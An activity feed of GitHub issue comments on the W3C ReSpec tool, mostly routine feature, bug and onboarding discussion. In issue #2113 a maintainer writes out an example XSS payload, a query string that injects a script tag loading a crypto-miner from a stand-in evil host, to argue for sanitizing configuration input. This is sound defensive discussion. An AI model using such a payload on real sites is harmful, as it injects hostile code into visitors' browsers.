<p class="practisedesc"> refers to https://github.com/w3c/respec/blob/develop/assets/bp.css directly.

[2019-03-14 10:23] isunitha98selvan commented on #2133
`ul.classList.add("advisement")` will not work practisebox is not what needs to be modified. As far as I see it, we will have to edit the wiki to change it to `<p class="advisement">` and remove the practisedesc function from bp.css

[2019-03-14 14:06] himanish-star commented on #1693
@marcoscaceres, taking a look into this issue :)

[2019-03-15 04:31] AmeliaBR commented on #1636
Related: #919

But it looks like this is now fixed for W3C specs?
https://github.com/w3c/respec/blob/7f22f1e283a9fa4be211a5e70510c1e48a29bc5b/src/w3c/templates/sotd.js#L304-L315

It would be nice to use that function for CG/BG reports, though, they still use the old text if a mailing list is specified:
https://github.com/w3c/respec/blob/7f22f1e283a9fa4be211a5e70510c1e48a29bc5b/src/w3c/templates/cg

[2019-03-15 04:40] AmeliaBR commented on #919
I think the main concerns in this issue re using GitHub for comments by default have now been addressed (in the regular State of This Document template, anyway: the community group/business group SOTD template needs to be updated).

But in general, it would be nice to be able to:

1. Turn off printing the standard request for comments, without removing config data.
2. Have access to the GitHub iss

[2019-03-15 04:50] marcoscaceres commented on #919
The above are great suggestions. Thanks @AmeliaBR!

Can you help me understand a bit more about number 1?

How do you envision it working?

[2019-03-15 05:09] marcoscaceres commented on #2113
@lkttyagi please see https://github.com/w3c/respec/issues/2124

[2019-03-15 05:19] marcoscaceres commented on #2133
@isunitha98selvan, please see https://github.com/w3c/respec/pull/2153#issuecomment-473121835

It's basically what needs to be done.

[2019-03-15 16:04] aarondtaveras commented on #1955
Hey everyone, I've been browsing through this project and I'm looking to contribute!

I see that this issue is still open and I'd like to take a crack at it if that's acceptable. I'll stay on this thread to keep asking any questions that I may have. Has there been any progress on this after setting up the `idb` dependency? Thank you, and I'm looking forward to helping out the team! 😄

[2019-03-15 16:22] AmeliaBR commented on #919
@marcoscaceres

I'm envisioning a boolean flag configuration parameter, `includeSOTDCommentsRequest` (or something with the same meaning but less verbose), that defaults to `true`.  Setting it to `false` would override the checks that print the boilerplate text based on whether there is a github repo and mailing list config.

That way — and especially in combination with the options for more granu

[2019-03-15 20:04] Swapnilr1 commented on #1868
Can I work on this?

[2019-03-15 21:01] marcoscaceres commented on #1955
@aarondtaveras, I think this is actually fixed, but #2154 needs some work if you’d like to help.

[2019-03-15 23:03] aarondtaveras commented on #1955
@marcoscaceres, I’d love to! #2154 is the PR for updating the `idb` version. Is updating the version to `4.0` what you’d like me to take a look at?

[2019-03-15 23:15] marcoscaceres commented on #1955
Yes please.

[2019-03-16 11:36] sidvishnoi commented on #1955
`biblio-db.js` still uses raw `indexedDB` instead of `idb`

[2019-03-17 07:17] marcoscaceres commented on #2144
closed via #2156

[2019-03-17 07:17] #2144 closed

[2019-03-17 12:25] sidvishnoi commented on #1757
Closed via https://github.com/marcoscaceres/respec.org/pull/2, https://github.com/marcoscaceres/respec.org/pull/3

[2019-03-17 12:25] #1757 closed

[2019-03-18 02:11] saschanaz opened #2161 "Migrate to webpack built version on tests"
Tests based on html files e.g. pubsubhub-spec.html still depend on requirejs. We may want to use webpack-built ReSpec instead to do #1975.

[2019-03-18 05:52] marcoscaceres opened #2163 "Work with w3c to serve new highlight bundle"
The W3C is currently serving the hljs bundle from gh-pages branch. However, we've now externalized that the highlighter into its own module. Ideally, the bundled should be getting served by the W3C from new repository.

https://github.com/marcoscaceres/respec-hljs

cc @deniak

[2019-03-18 05:54] marcoscaceres commented on #2163
@deniak I think what we need to do is transfer https://github.com/marcoscaceres/respec-hljs to the w3c GitHub org. And then redo whatever magic you are doing on the W3C side to currently mirror the ReSpec builds.

[2019-03-18 06:03] deniak commented on #2163
@marcoscaceres I'm missing something here. Can you point me where W3C is serving that bundle so I can evaluate what needs to be change?
Also, since it's used in respec, I don't think it's an issue to transfer the ownership of the repo to W3C

[2019-03-18 06:05] marcoscaceres commented on #2163
Apologies I want not very clear:

Right now, the W3C hosts for us:

https://www.w3.org/Tools/respec/respec-highlight.js

And that was originally a mirror of:
https://github.com/w3c/respec/blob/develop/js/deps/respec-highlight.js

[2019-03-18 06:07] marcoscaceres commented on #2163
Now, we would like it to mirror:

https://github.com/marcoscaceres/respec-hljs/blob/hljs/dist/respec-highlight.js

(but I'd like to transfer the "marcoscaceres/respec-hljs" repo to the W3C space in the process)

[2019-03-18 08:59] deniak commented on #2163
The repository has been transferred to w3c: https://github.com/w3c/respec-hljs
and we should now serve the latest version of the file on w3.org

[2019-03-18 09:04] marcoscaceres commented on #2163
Amazing! Thanks so much @deniak!

Just reopening as I need to do a little cleanup now on the ReSpec side.

[2019-03-18 11:15] #2163 closed

[2019-03-19 04:47] gaurav3210 commented on #2065
Is there any issues which not yet get assigned. Please tell about that I want to get assigned.

[2019-03-19 04:48] marcoscaceres commented on #2065
@gaurav3210, you are free to grab any claimed issue that hasn't been completed after a week.

[2019-03-19 04:49] gaurav3210 commented on #2065
Thank you sir.

[2019-03-19 04:56] gaurav3210 commented on #2065
Will you please assigned this issue to me. I will PR by tomorrow

[2019-03-19 05:21] marcoscaceres commented on #2065
@gaurav3210 please see the good first issues list. If you are interested in GSoC, having self initiative is a prerequisite.

[2019-03-19 06:19] saschanaz commented on #2161
I'm not adding `good first issue` because I'm seeing a blocker: currently `makeRSDoc()` with webpack-built ReSpec finishes processing even before inserting our custom test configuration.

[2019-03-19 10:59] marcoscaceres opened #2167 "xref defaults"
Been playing around with @sidvishnoi xref implementation, and it's simply amazeballs. Some things I thought of as I was playing around - we should extend the configuration:

• `xref: true` //enable it, what we have today.
• or, `xref: ["list", "of", "specs"]` (get automatically added to `<body data-cite="">` )
• or `xref: "w3c"` (defaults for w3c..., which would include "html, infra, url, promises

[2019-03-20 08:46] marcoscaceres opened #2170 "Autofilling an anchor not working in deeply nested algorithm?"
## Important info

* URL to affected spec: https://github.com/w3c/performance-timeline/pull/115
* ReSpec version: Click the ReSpec pill (e.g., 20.0.1).
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?: In https://github.com/w3c/performance-timeline/pull/115 something is preventing the section's title from getting filled.

But what I

[2019-03-20 11:41] Swapnilr1 commented on #1868
@marcoscaceres I am not able to replicate this issue on my end.
I looked at the spec you linked to (https://w3c.github.io/navigation-timing/) and changing
`<a href="https://tools.ietf.org/html/rfc7234">HTTP cache</a>` to `<a data-cite="rfc7234">HTTP cache</a>` worked fine for me.

Could you please just confirm if the issue still exists or not?

[2019-03-20 12:57] Swapnilr1 commented on #2170
@marcoscaceres Fixed in #2172.

[2019-03-20 13:28] Swapnilr1 commented on #2167
@sidvishnoi If you are not working on this, I would like to work on it.

[2019-03-20 14:00] marcoscaceres commented on #1868
Yeah, I also couldn’t replicate it either. Thanks for confirming. Closing as works for us.

[2019-03-20 14:00] #1868 closed

[2019-03-20 14:02] marcoscaceres commented on #2167
@Swapnilr1, feel free to take it. However, we are still beta testing xref... but I guess it will be fine to set up some defaults and implement the array.

[2019-03-20 21:33] #2170 closed

[2019-03-20 21:39] marcoscaceres commented on #948
Unfortunately, intersection observers turned out to be the wrong too for the job. We don’t have a sane way yet on the web platform to detect if two elements are overlapping 😭 closing as wont fix.

[2019-03-20 21:39] #948 closed

[2019-03-21 02:02] marcoscaceres opened #2174 "Definitions that abbreviate"
Given, for instance,

[code]

It would be nice to able to add `data-abbr`:

[code]

which would then render as:

"primary account number (PAN)"

And PAN would be added to the inline.js abbreviations map. So, then, one could just write:

[code]

And ReSpec would automatically wrap that in `<abbr title="primary account number">PAN</abbr>`.

What would be nice also, is for ReSpec to automatically der

[2019-03-21 03:06] yatri1609 commented on #948
@marcoscaceres

`var is_colliding = function( $div1, $div2 ) {

	// Div 1 data

	var d1_offset = $div1.offset();

	var d1_height = $div1.outerHeight( true );

	var d1_width = $div1.outerWidth( true );

	var d1_distance_from_top = d1_offset.top + d1_height;

	var d1_distance_from_left = d1_offset.left + d1_width;

	// Div 2 data

	var d2_offset = $div2.offset();

	var d2_height = $div2.outerHeight(

[2019-03-21 03:09] marcoscaceres commented on #948
We could, but we'd have to run it continuously (or when we intersect `.logos`). So it would just burn battery/CPU cycles for something that's just a gimmick.

I'd rather wait until we have hit testing support on the web platform. Then we can offload real intersection to the browser.

[2019-03-21 12:43] saschanaz commented on #2021
@marcoscaceres Why not when there is any fragment or path? IMO citing with fragment is still citing.

[2019-03-21 19:13] pradeepgangwar commented on #2021
@marcoscaceres Since there was no activity on #2021 for around 22 days so I created a PR #2171 that is similar to this one.
@yatri1609 Please check before making a PR on a issue so that someone else efforts does not go in vain.

[2019-03-22 04:19] marcoscaceres opened #2179 "xref should handle singular and plural cases"
Given:

[code]

xref should be checking for "code points" and "code point", where "code point" is the match in the infra spec.

cc @sidvishnoi

[2019-03-22 05:15] marcoscaceres opened #2180 "Regression: normative biblio things end up in informative section"
## Important info

* URL to affected spec: https://w3c.github.io/payment-request/#references
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:
Duplicate bibliographical entries:
https://w3c.github.io/payment-request/#references

DOM and dom, weidl and WEBIDL

But what I was expecting?:

For there to be no duplicates.

Optional, step

[2019-03-22 05:26] saschanaz commented on #1469
@marcoscaceres This has always been my ultimate purpose, for binary-less lighter dependencies and easier debug. Could we bake an experimental build with minimal features to check what should be done, although I'm currently not sure which feature to start.

[2019-03-22 13:55] Swapnilr1 commented on #2180
@marcoscaceres Changing https://github.com/w3c/respec/blob/f7177978f10ec844b95a5066234df9b01f374744/src/core/xref.js#L245 to
`closestInform && !normative && ` fixed the issue when I tested this. This is just a quick hack I did by poking around - I am not sure if this is a valid fix, since I don't exactly know what the module is doing. So I have not made a PR for now.

[2019-03-22 20:36] devanshbatra04 opened #2182 "Tests needed for core/contrib"
There are a few things wrong with ```core/contrib```.
https://github.com/w3c/respec/blob/develop/src/core/contrib.js#L44 does not allow for token-only Authentication, which is incorporated in ```core/github```
https://github.com/w3c/respec/blob/develop/src/core/contrib.js#L29 too fails as it requires another asynchronous resolution of the response to get a JSON.
I have solved both of these in #218

[2019-03-22 20:57] marcoscaceres commented on #2182
A few more tests would be really great.

[2019-03-22 21:06] marcoscaceres commented on #2180
@Swapnilr1 thanks for investigating. I'll have a look, but what you describe above like might be a reasonable fix.

[2019-03-22 21:16] devanshbatra04 commented on #2174
On it. :-)

[2019-03-23 00:58] prithvihv commented on #2113
hey, we would just have to authenticate the orcid string right ? the image would be the same ?

[2019-03-23 04:28] marcoscaceres opened #2184 "variable inlines should support generic types"
For example:

[code]

[2019-03-23 09:34] Swapnilr1 commented on #2167
@marcoscaceres A question about the plan:

1. `xref: ["spec1", "spec2", "spec3"]` would result in `<body data-cite="spec1 spec2 spec3">`. `xref: true` still applies for the rest of the document? Or restricted to just occurrences of `["spec1", "spec2", "spec3"]` in the document?

2. About the profiles, where do we store the profile? Do we hard-code the list of specifications in w3c profile (I am mo

[2019-03-23 10:54] marcoscaceres commented on #2167
Question 1: xref true still applies, it’s not restricted to that set.

Question 2: it’s ok to hard code them into xref for now. We can figure out where to put them later.

[2019-03-23 11:31] Swapnilr1 commented on #2167
Hmm, one more doubt, currently we use Xref as  either,
Case 1: `xref: true` or
Case 2: `xref: { url: apiURL }`.
Already clarified for Case 1, but for Case 2, is the following OK:
`xref: { url: apiURL }` - same current implementation.
`xref: { url: apiURL, specs: ["spec1", spec2"] }` (add to `<body data-cite="">`)
`xref: { url: apiURL, specs: "w3c" }`   (add all of the specs in the profile to `<bod

[2019-03-23 12:20] marcoscaceres commented on #2167
Good observation. I think what should happen is, for example:

Becomes internally {specs: [“spec”] }

Similarly:

Becomes internally represented as:

{ specs: hardCodedArrayOfW3CSpecs }

And so on. Users can also use the object, as a long hand solution. However, having the declarative array of string should still be supported, with the fallback being using the detailed object structure. Hope that

[2019-03-23 12:31] Swapnilr1 commented on #2167
@marcoscaceres OK, just to make sure I understood,
1. `xref: true` -> convert internally to `xref: { }`. (`conf.xref` evaluates to true, and that's it)
2. `xref: [“spec1”, "spec2"]` -> convert internally to `xref: { specs: ["spec1", spec2"] }`
3. `xref: "w3c"` -> convert internally to `xref: { specs: ["hardcoded"," specs"] `
4. `xref: { url: apiURL }` - leave as is.
5. `xref: { url: apiURL, specs:

[2019-03-23 12:43] sidvishnoi commented on #2167
You got it. But for consistency, no matter what user gives us (true, "w3c", or [...specs]) we would like the final `conf.xref` to look like
[code]

[2019-03-23 23:42] #2180 closed

[2019-03-24 06:46] Swapnilr1 commented on #884
I would like to work on this, incrementally.

[2019-03-24 08:32] saschanaz commented on #2184
Should also support spaced types e.g. `unsigned long long`.

[2019-03-24 09:04] marcoscaceres commented on #2184
Yeah, ran into that today 😁

[2019-03-24 15:29] marcoscaceres commented on #1469
Excited to see where this ends up!

[2019-03-24 16:59] devanshbatra04 commented on #1996
Can I take this. I understand you might want to keep it for GSoC. Really looking forward to a challenging issue. :sweat_smile:

[2019-03-24 19:26] marcoscaceres commented on #1996
This one is higher priority if you’d like a challenge:

https://github.com/w3c/respec/pull/2154

[2019-03-25 04:06] marcoscaceres commented on #394
Blocked on https://github.com/heycam/webidl/issues/636

We might be getting new syntax for this.

[2019-03-25 04:34] marcoscaceres commented on #2184
I think we can basically just split on ":"... left side is variable, right side is type. Done.

[2019-03-25 06:05] sidvishnoi commented on #2184
Right side is type already. We need to update the regex. Maybe add like this?
[code]

[2019-03-25 06:10] marcoscaceres commented on #2184
But if we know everything on the right of : is type, what would we do with the regex?

[2019-03-25 06:52] sidvishnoi commented on #2184
Regex is for splitting the text in `subtxt`. We can have a simpler regex like `\B\|.+(?:\:.+)\|\B`. I'm not sure of the cases it may go "bad" - like over matching text.

[2019-03-25 07:08] lolimay commented on #2065
I am so confused about this feature. In my opinion, instead of warning user that those duplicated configurations should be removed, we can introduce the concept of configuration priority. In this way, `core/defaults` with higher priority can overwrite `w3c/defaults` with a lower priority so that ReSpec can automatically these handle configuration conflicts instead of bothering users.

@marcoscacer

[2019-03-25 07:25] lolimay commented on #2065
Sorry for possibly misunderstanding what you mean:

Are you mean that we should warn users that which configrations were turned on by default?

[2019-03-25 07:37] marcoscaceres commented on #2184
I was thinking if we could send the type into webidl2.js, we can get back a simple AST. Then we could have some fun :)

[2019-03-25 10:20] #1631 closed

[2019-03-25 10:25] marcoscaceres commented on #2065
Yes... but I'm having second thoughts. Reflecting on the previous discussions, I think it's fine to just leave them.

[2019-03-25 10:25] #2065 closed

[2019-03-25 11:06] lolimay commented on #921
Hi, @marcoscaceres . Is this issue still valid? I think I could work on this.

[2019-03-25 11:11] marcoscaceres commented on #921
heh, sorry @lolimay... you keep finding all the bogus ones. We probably don't want to preload this, as it's a low priority resources. On the bright side, you've helped closed two issues, so ... 🏆

[2019-03-25 11:11] #921 closed

[2019-03-25 11:15] lolimay commented on #921
That's really a pity😂, I believe that I can fix some valuable issues later.

[2019-03-25 15:08] marcoscaceres opened #2195 "Remove hardcoded github url"
The Github module contains a hard-coded URL, meaning that it’s pinging GitHub during testing.
https://api.github.com/rate_limit

This should be dynamically set via the appropriate configuration option instead so that it works with our testing server.

[2019-03-25 15:19] devanshbatra04 commented on #2195
On it. :)

[2019-03-25 15:30] #2174 closed

[2019-03-25 16:08] pradeepgangwar commented on #1050
Working on it.

[2019-03-26 00:27] marcoscaceres commented on #2127
No longer relevant as we now bundle hljs independently.

[2019-03-26 00:27] #2127 closed

[2019-03-26 00:39] marcoscaceres opened #2196 "Regression: noRecTrack text not showing"
## Important info

* URL to affected spec: https://w3c.github.io/payment-method-basic-card/
* ReSpec version: Click the ReSpec pill (e.g., 20.0.1).
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

What happened (e.g., it crashed)?:
The noRecTrack related text is not being added.

But what I was expecting?:
For the associated text to be there.

Optional, steps to rep

[2019-03-26 00:57] devanshbatra04 opened #2198 "New Copydeps tool which uses GulpJS"
Currently, the copydeps tools simply copies the dist versions of npm packages. This could have several disadvantages. It doesn't minify them, or remove comments.

I propose we set up [gulp](https://gulpjs.com/) tasks instead.

More importantly, gulp tasks would allow us to convert CommonJS and ES dependency packages to AMD (until we keep using requireJS). And avoid issues like #2191.

It could als

[2019-03-26 01:10] marcoscaceres commented on #2198
We do that when we run uglify in ./tools/builder.js

Plan is to overcome this eventually by moving to Webpack (#1975).

[2019-03-26 01:11] #2198 closed

[2019-03-26 09:12] marcoscaceres commented on #2195
Closed by  #2200

[2019-03-26 09:12] #2195 closed

[2019-03-26 11:10] Swapnilr1 commented on #2179
Working on it.

[2019-03-26 16:04] devanshbatra04 commented on #1084
Been thinking over this.
We could have some debug functions/test functions. They would be very specific to the critical code paths that are most likely to yield an error/warning.

And then when the user clicks the button to list the warning/error, add a button "Test With Custom Input".
On clicking it, we could have a modal pop up with a description specific to each such function.

Should I come up

[2019-03-26 19:39] pradeepgangwar commented on #2196
I guess the issue was fixed by #2199. Is there anything left @marcoscaceres ?

[2019-03-26 19:55] marcoscaceres commented on #2196
Thanks for the reminder. No, nothing left here.

[2019-03-26 19:55] #2196 closed

[2019-03-26 21:44] pradeepgangwar commented on #1955
I guess this was fixed by #2191 . @marcoscaceres Does it require more work?

(I browse through issues and at some point of browsing/searching I find some merged PR 😆. Leaves me with a sad face xD)

[2019-03-26 22:07] marcoscaceres commented on #1955
Still open, but @Swapnilr1 is working on it.

@pradeepgangwar, will need to find another one for you.

[2019-03-26 22:09] pradeepgangwar commented on #1955
Yeah, no problem. I will look for other bugs. 😄

[2019-03-26 22:17] marcoscaceres commented on #1064
@pradeepgangwar, what about this one? To see the problem, open, for example:
https://w3c.github.io/payment-method-id/

Click on the "ReSpec" button on the top right... now, it should be possible to navigate that menu using the up/down keys, and it should be possible to select an option with the enter key.

The ui code is here:
https://github.com/w3c/respec/blob/develop/src/core/ui.js

[2019-03-26 22:21] pradeepgangwar commented on #1064
Yeah sure, Thanks @marcoscaceres I will take a look at it. 😃

[2019-03-26 23:11] markasoftware commented on #2113
Isn't the ReSpec configuration trusted, since it is provided in the same document as the specifications themselves @marcoscaceres ?

[2019-03-26 23:18] markasoftware commented on #2182
Should these tests make a real call to the GitHub API or would it make more sense to mock out core/github?

[2019-03-27 00:19] saschanaz commented on #2113
Not always, because we can override the configuration via url query. Try https://w3c.github.io/DOM-Parsing/ and https://w3c.github.io/DOM-Parsing/?specStatus=REC for example.

[2019-03-27 01:08] marcoscaceres commented on #2182
These would be mocked out, similarly to what we did with GitHub issues:
https://github.com/w3c/respec/tree/develop/tests/data/issues

[2019-03-27 02:46] markasoftware commented on #2113
Should I open a separate issue for sanitizing the configuration? As noted in this thread, some properties of people (like their names) are [expanded as HTML](https://github.com/w3c/respec/blob/2936011fdc52e4a608181ed088cd77a2bb38e017/src/w3c/templates/show-people.js#L12), which is an XSS vulnerability if you think about it right.

My preferred solution would be to treat the config as trusted becau

[2019-03-27 03:01] marcoscaceres commented on #1084
Can probably avoid the clicking part... I was thinking we could just have callbacks on the configuration objects in the tests... so:

[code]

[2019-03-27 03:01] marcoscaceres commented on #1084
Fixed some typos above...

[2019-03-27 03:05] marcoscaceres commented on #2113
That seems like a sensible compromise.

[2019-03-27 03:09] saschanaz commented on #2113
I'm not sure how "untrusted sources" would be defined as currently the configuration object is merely a global variable.

[2019-03-27 03:17] marcoscaceres commented on #2113
Anything coming from a query string would be untrusted: gets HTML sanitation prior to being applied to the conf object.

[2019-03-27 03:19] saschanaz commented on #2113
What if a config object is from unencrypted external script?

[2019-03-27 03:21] marcoscaceres commented on #2113
Not sure I follow. For the external script to be included in the first place, won’t the author have to explicitly include it in the HTML?

[2019-03-27 03:50] saschanaz commented on #2113
I'd say yes... maybe we could just say "do it at your own risk".

[2019-03-27 04:10] marcoscaceres commented on #2113
The problem is not author risk... the attack is evil person on twitter crafts a malicious URL to an unsuspecting spec, and then tweets out the link: "Look at this cool new W3C Spec everyone!".

People on twitter load the spec and the URL causes a crypto-miner script to be injected via, say, `?specSubTitle=LOLs<script src="https://crypto-miner.evil/script"></script>`.

[2019-03-27 04:24] saschanaz commented on #2113
It was the answer to this:

If an author somehow decides to insert any script via unencrypted HTTP URL, then a MITM attack can send a malicious script to modify `respecConfig`. But maybe too general problem that browsers already warn.

[2019-03-27 04:26] marcoscaceres commented on #2113
Yeah, agree. There is not much we can do there... if it's tls/http mixed content, then the browser will at least block the mixed content.

[2019-03-27 04:27] saschanaz commented on #2113
So, what's the decision here? Do we implement both `orcid` and HTML thing?

[2019-03-27 04:44] marcoscaceres commented on #2113
Yes, we should:

  1.  sanitize inputs
  2. add `orcid` member to person.

Then 2 would generate the HTML... we might need to put the orcid png into a stylesheet or get the w3c to host it for us.

[2019-03-27 04:44] marcoscaceres commented on #2113
Note that 1 could be a totally different/unrelated bug to this one.

[2019-03-27 05:12] markasoftware commented on #2113
I'll work on this over next day or two. Thanks for all the quick responses!

[2019-03-27 06:06] devanshbatra04 commented on #1084
Oh okay. Thanks.
I guess I misunderstood. Will work on this today.

[2019-03-27 06:07] marcoscaceres commented on #1084
No problem - you were definitely on the right track :) Eventually we might want to do UI testing.

[2019-03-27 06:20] marcoscaceres commented on #2113
No problem. Appreciate your help, @markasoftware. If you need any help, give us a shout!

[2019-03-27 08:10] saschanaz commented on #1469
I got a blocker from hyperHTML, which cannot be imported on node.js. Maybe we have to fork `viperhtml` (which is a lot lighter than `hyperhtml`) to make it work.

[2019-03-27 11:06] devanshbatra04 commented on #2061
I think a good solution would be running the respec2html tool against a few (10 or so?) real world specs like the Media Source Extensions mentioned.

And also tweak the current examples as and when such issues are identified?

[2019-03-27 15:18] marcoscaceres commented on #1469
Pinged WebReflection for guidance.

[2019-03-27 16:37] WebReflection commented on #1469
hyperHTML is 100% code covered [via node](https://github.com/WebReflection/hyperHTML/blob/master/test/runner.js), all you need to do is to write `require('basichtml').init()` before requiring `hyperhtml`.

I've used [basichtml](https://github.com/WebReflection/basichtml#basichtml) to serve output [even in cloudflare](https://twitter.com/WebReflection/status/1064865078019805184) so everything you n

[2019-03-28 00:03] AmeliaBR opened #2207 "Handling of <section id="issue-summary"> is poor"
## Important info

* URL to affected spec: (not online yet)
* ReSpec version: 24.7.0
* [x] I did a "hard refresh", but it's still busted.

## Description of problem

ReSpec doesn't work well if you try to customize the Issue Summary.

According to [the wiki on `issue-summary`](https://github.com/w3c/respec/wiki/issue-summary),
if you create a section with that `id`, it will be used for the auto-ge

[2019-03-28 00:26] saschanaz commented on #1469
So it looks like `require('basichtml').init()` defines `document` globally? That somehow clashes with `jsdom`... But thanks, TIL `basichtml`.

[2019-03-28 03:42] marcoscaceres opened #2208 "Single letter variables don't get converted to var"
What happened (e.g., it crashed)?:

If you have: `Let |p| be new Promise`...

But what I was expecting?:

It should convert `|p|` to `<var>p</var>`.

Similarly, if you have: `Let |p:Promise| be newly created Promise`.

[2019-03-28 05:32] marcoscaceres opened #2210 "abbr title's whitespace needs normalization"
As we are taking the taxtContent, we need to normalize the whitespace... otherwise, this happens:

![Screen Shot 2019-03-28 at 4 31 19 PM](https://user-images.githubusercontent.com/870154/55132599-0f3b1880-5177-11e9-88a4-599349591850.png)

[2019-03-28 05:33] marcoscaceres commented on #2210
@devanshbatra04, you want to work on this? Should be quick.

[2019-03-28 05:44] marcoscaceres opened #2211 "Auto-expanding inline references"
In ReSpec, we currently support the ability to, for example, write:

[code]

That gets expanded to:

[code]

However, `<a data-cite="payment-request"></a>` is kinda ugly... What would be nicer would be to write inline (3 square brackets):

[code]

And that then gets transformed to:

[code]

And ReSpec then handles the rest.

[2019-03-28 06:08] marcoscaceres commented on #2207
Thanks for the test case and details @AmeliaBR. Will try to fix soon.

[2019-03-28 06:17] devanshbatra04 commented on #2210
Yup. Sure.

[2019-03-28 07:48] Swapnilr1 commented on #2211
I would like to work on this. Need some time though.

[2019-03-28 07:51] devanshbatra04 commented on #2210
This isn't Respec's fault.
Here's the markdown written in the spec's source.
![Screenshot from 2019-03-28 13-18-10](https://user-images.githubusercontent.com/33961252/55139563-10128100-515c-11e9-98de-fd5bffc83015.png)

It works well if they change it to
[code]

[2019-03-28 08:34] saschanaz opened #2212 "Explore about replacing `normalizePadding()` with `reindent()`"
Turns out that a simple replacement doesn't work, so explore about why.

[2019-03-28 09:40] marcoscaceres commented on #2210
Like with JS, authors don't have control over line length. We run HTML tidy over the document, and tidy decides where to break things up. So, it's still ReSpec's fault as ReSpec is the one setting the title attribute :)

[2019-03-28 09:43] devanshbatra04 commented on #2210
Oh Okay. Didn't know that. :sweat_smile:
I will see to it now.

[2019-03-28 09:51] marcoscaceres commented on #2207
@pradeepgangwar do you want to work on this one? The bug happens somewhere here:
https://github.com/w3c/respec/blob/develop/src/core/issues-notes.js#L138

[2019-03-28 09:52] marcoscaceres commented on #2210
No problem :) All part of learning the magic of spec writing.

[2019-03-28 11:13] devanshbatra04 commented on #1615
Interesting. That should be issues, notes, contributors, commenters. We could either
1. have the DOM re render with the new assets. The user should probably have a conf option to set this. I wouldn't want my GH requests to keep running out.
2. Just set an expire limit on the cached objects. The browser will handle the rest. If the user refreshes after the said time, the cache should have expired.

[2019-03-28 11:18] saschanaz commented on #2212
Looks like indentation processing is weird on `normalizePadding()`. For example:

[code]

Per the markdown spec, the text should be interpreted as `<pre>` because of its indentation. Instead, the function tends to interpret it as normal unindented markdown by trimming the text and all its indentations.

[2019-03-28 11:40] WebReflection commented on #1469
@saschanaz if you have `jsdom`, and it pollutes the global scope, `hyperHTML` should work already.

If you don't you can use an empty `.init()` or [specify various things](https://github.com/WebReflection/basicHTML#new-init-in-013), including the object to pollute.

i.e.
[code]

but then again, if you have already a `document` everything should just work, you just need to require `hyperhtml` **aft

[2019-03-28 11:51] saschanaz commented on #1469
I mean `require("basichtml").init(); require("jsdom");` fails. Maybe jsdom detects browser environment by checking global existence of `document` or something...

Currently I decided to use viperhtml for template string and parse the result with jsdom again, as I'm currently trying to remove any global or module level states. It's still a draft, so maybe I could migrate to `basichtml` later if it

[2019-03-28 11:59] WebReflection commented on #1469
that is not a real-world use case, but even if you need to do that, you can pass an object instead, so nothing gets polluted, and jsdom will work.

You are contradicting yourself, since jsdom pollute the global scope, right?

Sure, whatever works best. I don't even know what is your actual goal (had no time to read this whole thread, I just jumped in at "I got stuck due node" when all I do is usin

[2019-03-28 12:00] saschanaz commented on #1469
AFAIK it's not, does it?

[2019-03-28 12:04] WebReflection commented on #1469
actually my bad, it doesn't. I've seen tests written with `global.window = new JSDOM` but apparently it doesn't indeed pollute anything by its own.

Then again, neither does `basichtml`, it's just the handy default that never, personally, hurts.

In regards of `hyperHTML` it needs to do some feature detection requiring a `document` in a way or another.

[2019-03-28 12:33] marcoscaceres commented on #2212
Correct... so, this is for legacy reasons. People were writing markdown inside the body indented like that:(

[2019-03-28 12:40] saschanaz commented on #2212
Is there a live example? I saw this on our tests that appends indented template string.

[2019-03-28 12:44] marcoscaceres commented on #2212
I’ll dig some up.

[2019-03-28 12:48] marcoscaceres commented on #2212
https://github.com/coremob/coremob-2012/blob/gh-pages/index.html

[2019-03-28 12:48] marcoscaceres commented on #2212
Hello from 2012!

[2019-03-28 12:53] saschanaz commented on #2212
🤦‍♀️

[2019-03-28 12:57] marcoscaceres commented on #2212
Heh, yep. Kinda stuck. But we could make a case to break things for sanity’s sake.

[2019-03-28 13:07] #2021 closed

[2019-03-28 13:57] devanshbatra04 commented on #1084
So I was working on this and figured this was probably not the best approach.
1. This does not give us all the errors and warning to work with. That means we wouldn't be able to test them in conjunction. (One warning/error may be related with another but we have no way of interacting with the two. As both are dealt with by different promises)
2. Also there would be several unnecessary errors. Most

[2019-03-28 17:56] pradeepgangwar commented on #2207
@marcoscaceres I have figured out something for previous bug you gave (hope to make a WIP PR soon). So yes, I will also try this one. :D

[2019-03-29 05:08] #2210 closed

[2019-03-29 07:05] Swapnilr1 commented on #2208
The issue is with the regex for inline variables:
https://github.com/w3c/respec/blob/1121be0cdb5244b12a6462993b64cc6f59ba77b8/src/core/inlines.js#L140

Changing it to `"\\B\\|\\w[\\s\\w]*(?:\\s*\\:\\s*\\w+)?\\|\\B"` fixed the issue for me (i.e remove word character matching `\\w` in the middle), and also passes the tests in `inlines-spec.js`.
But I don't really know RegEx, so @sidvishnoi what was

[2019-03-29 09:14] sidvishnoi commented on #2208
New regex by @Swapnilr1 looks good to me. But I'll see if there are some other use cases and if we can simplify it.

[2019-03-30 03:59] #2167 closed

[2019-03-30 05:29] devanshbatra04 commented on #444
@marcoscaceres can I work on this?

[2019-03-31 00:30] marcoscaceres commented on #2184
@saschanaz, wdyt of the comment above? Doable?

[2019-03-31 02:17] saschanaz commented on #2184
webidl2.js is not exposing classes yet, and even if it did the classes doesn't support parsing string snippets yet. Supporting that would be absolutely great, though.

[2019-03-31 06:21] marcoscaceres commented on #2184
Ok, we should come up with a simple replica of https://github.com/w3c/webidl2.js/#idl-type

[2019-03-31 06:50] sidvishnoi commented on #2208
Played with the regex a bit. Found these cases:
<a href="https://user-images.githubusercontent.com/8426945/55285754-34b26700-53af-11e9-9703-b8583dbf8fad.png"><img src="https://user-images.githubusercontent.com/8426945/55285754-34b26700-53af-11e9-9703-b8583dbf8fad.png" width=300/></a>

and this regex to solve both #2208 and #2184
[code]
A slightly faster regex would be if we specify allowed charact

[2019-03-31 11:01] Swapnilr1 commented on #2208
@sidvishnoi  There is an issue with
[code]
![regex1](https://user-images.githubusercontent.com/35957512/55288195-95529b80-53d1-11e9-9d0e-52d708e6ac51.png)

means that `var1` becomes the name and `long| and |p` becomes the type.

The alternative
[code]
does not cause this error - but I think I am better off seeing a regular expressions reference rather than just trying out strings. Don't want to in

[2019-03-31 11:08] sidvishnoi commented on #2208
Yes, I was concerned about over-matching (See https://github.com/w3c/respec/issues/2184#issuecomment-476075781)
We need to stop the regex search at first `|`, and not go any further.
